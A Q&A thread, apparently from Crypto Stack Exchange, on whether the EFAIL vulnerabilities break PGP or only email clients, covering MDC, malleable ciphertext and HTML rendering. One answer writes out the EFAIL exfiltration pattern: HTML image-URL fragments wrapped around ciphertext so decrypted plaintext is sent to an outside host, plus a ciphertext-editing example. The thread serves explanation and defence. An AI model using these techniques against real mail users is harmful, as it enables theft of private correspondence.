# Is the software that uses PGP broken, or is it PGP itself?

Tags: encryption, signature, pgp, protocol-analysis, s-mime

PGP is all over the news (even on TV) and there seems to be a lot of confusion about it.

For the time being, people face articles like [Attention PGP users: new vulnerabilities require you to take action now](https://www.eff.org/deeplinks/2018/05/attention-pgp-users-new-vulnerabilities-require-you-take-action-now) which tell readers to deactivate their PGP plugins while raising concerns related to PGP beyond email client software and good, old email itself.

> A group of European security researchers have released a warning about a set of vulnerabilities affecting users of PGP and S/MIME.

Since I've been asked about the status of PGP several times today, I think a short Q&A related to this makes sense.

Do the new vulnerabilities mean that

1. there is a problem with PGP itself (as in: we should not use PGP encryption/signing at all), or
2. do the vulnerabilities "merely" point to a problem with email clients and the way they handle things (as in: PGP is fine outside or your email client)?

Differently stated: I'm asking to clarify if it is still safe to use PGP itself (eg sign/encrypt via commandline and transmit via non-email channels) or if there's a problem with the cryptographic internals of PGP.

Answer (score 61, accepted):

[Usenix Paper](https://www.usenix.org/system/files/conference/usenixsecurity18/sec18-poddebniak.pdf), replacing earlier [draft](https://web.archive.org/web/20180514214022/https://efail.de/efail-attack-paper.pdf) at [efail.de](https://efail.de/).

TL;DR: the vulnerability is in some popular email client software, often combined with an extension simplifying the use of an OpenPGP (e.g. GnuPG) or S/MIME implementation within the said software; e.g. an extension bundled in popular distributions of GnuPG v2, thus common.

The issue is that un-validated deciphered ciphertext is made available to the email client, *and* it acts upon it (e.g. following HTML links to addresses that an adversary collects), yielding a decryption oracle capable of deciphering a past or current ciphertext, and exfiltrating the plaintext.

It is fine to disable decryption functionality in the email client. It should remain so until that software (and any extension  it relies on) is checked or improved to suppress (or at least not automatically act upon and preferably flag as suspect) any deciphered plaintext that did not explicitly pass the [Modification Detection Code](https://www.rfc-editor.org/rfc/rfc4880#section-5.14) test for OpenPGP, or a similar check (to be defined) for S/MIME.

For OpenPGP, we can get back to the manual use of the bare OpenPGP tool (e.g. `gpg`), checking from stderr output that an [MDC](https://www.rfc-editor.org/rfc/rfc4880#section-5.14) check explicitly passed, otherwise not acting based on what's received, be it programmatically or manually. I have no workaround suggestion for S/MIME.

---

From [an official statement by the GnuPG and Gpg4Win teams](https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060334.html):

> 1. This paper is misnamed.  It's not an attack on OpenPGP.  It's an attack on broken email clients that ignore GnuPG's warnings and do silly things after being warned.
> 2. This attack targets buggy email clients.  Correct use of the [MDC](https://www.rfc-editor.org/rfc/rfc4880#section-5.14) completely prevents this attack.  GnuPG has had [MDC](https://www.rfc-editor.org/rfc/rfc4880#section-5.14) support since the summer of 2000.

---

<sup>Update: based on that [comment](https://crypto.stackexchange.com/q/59229/555#comment130304_59231) and [other answer](https://crypto.stackexchange.com/a/59241/555), and subject to dust settling, in GnuPG v2 two things are questionable, even if done on purpose so as not to break compatibility:</sup>
<sup>- Returning a status code of 0 (and a mere warning) in the absence of [MDC](https://www.rfc-editor.org/rfc/rfc4880#section-5.14), at least by default.</sup>
<sup>- A quirk specific to the Twofish algorithm prevents [MDC](https://www.rfc-editor.org/rfc/rfc4880#section-5.14) error catching.</sup>

Comment: What is "correct use of MDC"? I thought MDC was enabled by default.

Comment: @forest Correct use of MDC is to noisily reject messages _without_ an MDC before yielding a single bit of unauthenticated plaintext.  As of yesterday, probably no OpenPGP implementation deigned to do that.  It doesn't matter how assiduously senders _add_ the MDC if recipients accept messages with or without it.

Comment: @SqueamishOssifrage Ah, but when an MDC is present, it fails on error? I suppose it would be easy to patch GnuPG to refuse messages that lack MDC entirely.

Comment: @forest: I do not see how that would be possible without using arbitrarily large extra storage or memory when GPG is used as a pipe.

Comment: What is "un-validated deciphered ciphertext?"  If I could decipher it with my private key, then of course it's valid, isn't it?  And then, why would it be dangerous for my email client to follow links?

Comment: @Maxpm Valid in this context means unmodified, not simply capable of being decrypted. With public key crypto, the asymmetric cipher (e.g. RSA) will encrypt a symmetric key (e.g. AES) that then encrypts the message. An attacker can often modify the encrypted message without needing to change the key itself.

Comment: @fgrieu Of course, but I was thinking it could be implemented as an option. The option of course would be incompatible with GnuPG when being used as a pipe.

Comment: @forest if an mdc is present an attacker would just strip it, because having it is not mandatory.

Comment: @SEJPM You've gotta be kidding me. You can just strip it and GnuPG won't give a damn? A message with a stripped MDC is identical to a message with no MDC in the first place?

Comment: @forest It is not _identical_, but gpg will still happily hand out forged plaintext to whoever will listen and then print a stern warning on stderr.

Comment: Then I assume it does not exit with status 0?

Comment: @forest It exits with status 0 after printing a stern _warning_, not _error_.  Try it yourself: `echo hello world | gpg --recipient <myself> --compress-algo none --disable-mdc --encrypt > test.pgp; gpg < test.pgp; echo "status $?"`.  For more fun, flip some bits in the last few bytes of test.pgp.  (If you don't specify `--compress-algo none`, then you have to preserve the zlib checksum, which is a pain, but not insurmountable, as demonstrated in the efail paper.)

Comment: Man, that's unexpected. Hopefully this whole debacle will result in a more paranoid GnuPG.

Comment: The Twofish quirk is not a bug!  Twofish support was added before MDC support, and is the _only_ 128-bit block cipher added before MDC support.  So it was for _intentional compatibility_ reasons that the MDC is allowed to be omitted when decrypting Twofish messages!  (At least, it is _no more_ a bug than anything in the catastrophe of protocol misdesign that OpenPGP is.)

Comment: Fascinating! Such undocumented behavior will be the death of us all.

Answer (score 53):

There are a few parts to the EFAIL attacks.

Some parts are the fault of the mailer authors for exposing unnecessary attack surface via arbitrary incoming email.  Some parts are the fault of the OpenPGP and S/MIME designers for failing to heed modern cryptography engineering principles—in particular, failing to provide NM-CPA public-key encryption.

For advice on how to respond to EFAIL, see the [security.se question](https://security.stackexchange.com/q/185777/166968); this is about how the attacks work and what went wrong to enable them.

1. HTML interpretation.

   If you receive a message with `<img url="http://efail.de/0a7492fc62d437b8309a4288edcb1ab6">`, your mailer might load the URL http://efail.de/0a7492fc62d437b8309a4288edcb1ab6 to display the pretty picture there.  This is a standard problem of email trackers.  The same can be done with CSS URLs, active JavaScript content, *etc.*
2. OpenPGP and S/MIME trackers.

   If you receive a message signed by an unrecognized OpenPGP key id, your mailer may automatically download the URL `http://pool.sks-keyservers.net/pks/lookup?search=0x0a1b2c3d&op=get`.  Similarly, an S/MIME signature with an included certificate may specify an OCSP server to query, or a CRL list URL to download, or an intermediate CA URL to download.  An adversary may be able to control these as another kind of email tracker.
3. Direct exfiltration.

   In a multipart/mixed MIME container, concatenate a text/html part, an application/pgp or application/pkcs7-mime part containing ciphertext, and a text/html part:

   - text/html `<img url="http://efail.de/`
   - ciphertext
   - text/html `">`

   **The mailer helpfully decrypts the ciphertext and strings together `<img url="http://efail.de/`, the plaintext, and `">`.  Then the HTML engine fetches `http://efail.de/(plaintext)` as a URL** to draw the pretty picture, because everyone knows email need pretty pictures or else it won't catch on.  The image may not load, but it's too late: the plaintext is out the barn door.
4. Malleability of unauthenticated ciphertexts.

   Even if you can't persuade the mailer to concatenate parts, you may be able to *rearrange and edit* parts of an unauthenticated message of which you know some parts but not others, and exploit the HTML interpretation channel to exfiltrate it.

   For example, in an HTML password reset message, there may be a new password or a link to a new password at a known location:

   ```
   <img url="http://assets.example.com/logo.png">
   <p>Dear luser,
   <p>We are incompetent corporate overlords.
   We lost your password.  Sorry.
   You have to reset it by clicking on this link:
   https://bureaucracy.example.com/cgi-bin/resetPassword.js.php.cgi.gif?token=0a7492fc62d437b8309a4288edcb1ab6
   ```

   Cutting and pasting parts of the ciphertext we may be able to convert it into something like this:

   ```
   <img url="http://efail.de/0a7492fc62d437b8309a4288edcb1ab6">
   <p>Dear luser,
   <p>We are incompetent corporate overlords.
   We lost your password.  Sorry.
   You have to reset it by clicking on this link:
   https://bureaucracy.example.com/cgi-bin/resetPassword.js.php.cgi.gif?token=http://assets.example.com/logo.png
   ```

   The same technique can be used for other OpenPGP and S/MIME trackers outside HTML too.

   (I am omitting the gruesome details of exactly how this process works, so that you are not tempted to fixate on it and try to thwart this by rearranging your emails; you should instead thwart this by *using authenticated encryption* and generally doing modern cryptography engineering in the first place.  For the real details of the quite clever CBC and CFB gadgets through compression with studies of applicability to real-world data sets, read [the paper](https://efail.de/efail-attack-paper.pdf).)

This leaves several questions.

- Am I wrecked?

  **You're probably not wrecked just because of this.**  This attack tends to leave evidence lying around, so it's expensive to deploy.  But that doesn't mean the danger doesn't exist, and you won't *see* the evidence until it's too late, and it doesn't mean you're not wrecked by something else.
- Am I worse off than I would have been without OpenPGP or S/MIME?  Should I follow the EFF's hyperventilated advice and delete all my OpenPGP-related software?

  **You're probably not worse off than if you hadn't used OpenPGP or S/MIME,** except insofar as the difficulty of *using* OpenPGP has taken hours out of your life and prevented connections you would have made otherwise, and you're probably only using S/MIME if at all in a corporate bureaucracy, not with your human relationships or across organizational boundaries.

  After all, **this works when an attacker, who *already eavesdropped* on a message, cuts and pastes that message into a new one and resends it to the recipients**.  If you hadn't encrypted the message, then they would have the plaintext already and wouldn't need to interact with your mailer.

  **But you should definitely turn off HTML rendering.**  Don't just disable *sending* HTML mail, which is irrelevant to this attack; disable *rendering* HTML mail, which is how the adversary triggers this attack.

  As for the channels that work by automatic key download and revocation check: the trouble is that these may be needed to detect certificates that were revoked because the key was compromised.  So disabling these channels—if you can—may hurt in other ways.
- Should mailers interpret HTML?

  I would say no, but it's common practice today.  After all, everyone knows email needs pretty pictures or else it won't catch on.
- Should mailers interpret *unauthenticated* HTML?

  I would say *definitely no*, because unauthenticated data is [pure evil—don't touch it](https://www.youtube.com/watch?v=F6X9KcrXHwg)!  But it's still common practice.
- So this is squarely the mailer's fault for interpreting unauthenticated HTML, then?

  Still no.

  It *is* the mailer's fault for concatenating text/html parts with auto-decrypted ciphertext parts with text/html parts in multipart/mixed messages, as in part (2).

  But it is *not* the mailer's fault that an adversary can *selectively modify* ciphertexts with predictable changes to the plaintext, which is how part (3) of the attack works.

  **Had OpenPGP and S/MIME used symmetric-key *authenticated* encryption, the attack would have been thwarted.**  In that case, the only forgery an adversary can achieve is *wholesale replacement* of the message, not *selective modification*.

  As is, OpenPGP and S/MIME use a traditional ‘hybrid’ of public-key key encapsulation mechanism to transmit a key (shoehorned into an archaic public-key encryption scheme like RSAES-PKCS1-v1_5) for symmetric-key *unauthenticated* encryption.  The symmetric cipher is malleable, which is why we may be able to predictably cut and paste chunks of the message without the recipient being any the wiser.  More broadly, by using a hybrid with *malleable* encryption instead of *nonmalleable* authenticated encrytion, **OpenPGP and S/MIME failed to provide the standard goals of IND-CCA2 and NM-CCA2 for public-key encryption.**
- What about the MDC in OpenPGP?

  The MDC is a kludge with [no clear security goals](https://www.rfc-editor.org/rfc/rfc4880#page-51) that is voluntary on the part of the *sender*.  It can be removed by changing the unauthenticated packet type.  It is *intentionally not a MAC*.  It served as a speedbump, not as a defense.  Soon, the authors of OpenPGP software will make the MDC mandatory.  In rfc4880bis, there will presumably be real authenticated encryption with symmetric keys.

  **But OpenPGP as a whole was designed without a modern notion of formal security goals with actors in a protocol.**  Rather, it is a *format* for nesting encryption, signature, compression, and literal data in arbitrary combinations—which turns out to be [a bad idea](https://www.alchemistowl.org/pocorgtfo/pocorgtfo02.pdf#page=4) on its own, and when its creators were [confronted with a need for human-relevant security goals in applications](http://world.std.com/%7Edtd/sign_encrypt/sign_encrypt7.html) they [explicitly abdicated responsibility for it](http://www.metzdowd.com/pipermail/cryptography/2001-June/000273.html) and punted it outside the domain of cryptography.

  P.S.  S/MIME doesn't even have an MDC.
- But the mailers ignored status codes from `gpg`!

  If you can find me among the GnuPG documentation guidance on how to use it reliably in a mailer with meaningful security properties, or the option that causes `gpg` as a subprocess to *fail with nonzero exit code* if the MDC is missing,<sup>*</sup> then I will find you a living dodo.

  This is part of why the *application* Signal is an object of widespread interest, while the Signal *protocol* (which is allegedly also used by WhatsApp and other messengers) is an implementation detail that ordinary users don't need to know about.

  In contrast, PGP is the acronym that everyone knows now, but its *implementations* are personal choices like a sock color and nobody can keep straight the current preferred email integration *du jour*.  (Enigmail? Mailvelope? GPG Tools?)
- What if I use `gpg` manually?

  If you use `gpg` manually, you are dedicated, or a masochist, or both.

  Either way, you should be familiar with [thegrugq's guide to how to use PGP](https://gist.github.com/grugq/03167bed45e774551155), and you must read and understand every line of output that `gpg` prints to the terminal when you run it before you act on the file of output it produces.  Don't pipe `gpg` to other programs because `gpg` will happily spit out unauthenticated data (which is [pure evil—don't touch it!](https://www.youtube.com/watch?v=F6X9KcrXHwg)) before it tells you whether or not something even *could have been* a forgery.

  Remember that OpenPGP does not concern itself with anything *outside* the OpenPGP format.  A signed message doesn't cover the `From:` or `To:` or `Subject:` lines of an email it's embedded in.  When you verify a detached signature on a source distribution called something like `gnupg-1.4.14.tar.gz`, the signature doesn't cover the *name* of the file—only the content.  So a signature on the GnuPG 1.4.13 distribution will still work even if the file is named `gnupg-1.4.14.tar.gz`.
- Inline or PGP/MIME?

  If OpenPGP's arbitrary nesting of encryption, signature, compression, and literal packets wasn't bad enough, would you like another serving of arbitrary nesting of complex structured language rife with ambiguity on your plate?

---

<sub><sup>*</sup> You have to use the status fd to get this reliably, except if the sender used Twofish, in which case the current version of gpg2 *never* objects to a missing MDC.  (This has been changed in gpg2 master and will presumably be fixed in the next release of gpg2.)</sub>

Comment: `resetPassword.js.php.cgi.gif` 

Comment: To get OpenPGP signature to cover the name of the file, zip the file up and sign the zip.  The name of the zip can be modified, but not the name of its member file(s).

Comment: @MontyHarder That's all very well when you're _making_ the distribution, but it doesn't help to verify a distribution that _someone else already made_.

Comment: The generic problem with HTML is that it allows external content that originates from a different server. They should have left it at providing links, not retrieving the data itself - let the server do that if required. If you could receive a *self-contained* HTML message then everything would at least be in a sand-box, vastly reducing the attack surface. And you would not have to answer braindead questions such as "do you want to download images for this *untrusted email message*?"

Comment: @MaartenBodewes Bear in mind that this is not just about HTML!  The PGP and S/MIME signature, including information for identifying the external CA/CRL/_etc._ needed to verify the signature, are in the ciphertext too.  Is it reasonable to act on those?

Comment: @SqueamishOssifrage Yes, if they are signed together with the data, no if they aren't. If those URL's can be altered by an attacker then I **would** assume that the OpenPGP protocol is broken (which I'm not doing now). PS sorry for the many edits of the comment; wording is important here.

Comment: @MaartenBodewes They can be altered because the ciphertext is malleable.  The message is signed, and the key id or certificate is included in the signature; _then_ the message is encrypted.  The mailer has to act on the decrypted plaintext before verification.  If the ciphertext were nonmalleable, a forger would have no hope of _selectively modifying_ a message to exploit this attack; only wholesale replacement of the message would be feasible.  This is what happens when you don't bother to even think about security goals like NM-CCA2.  (This fails even NM-CPA.)

Comment: Time for my "Derf" moment or whatever, thanks you're right of course :)

Comment: I only use gpg manually, and it is fun.  It gives one a lot of control and one can get into the nitty-gritty details, which are interesting.  What becomes immediately evident is the weakness of the MDC packet scheme. Why this glaring weakness has been allowed to continue is quite astonishing.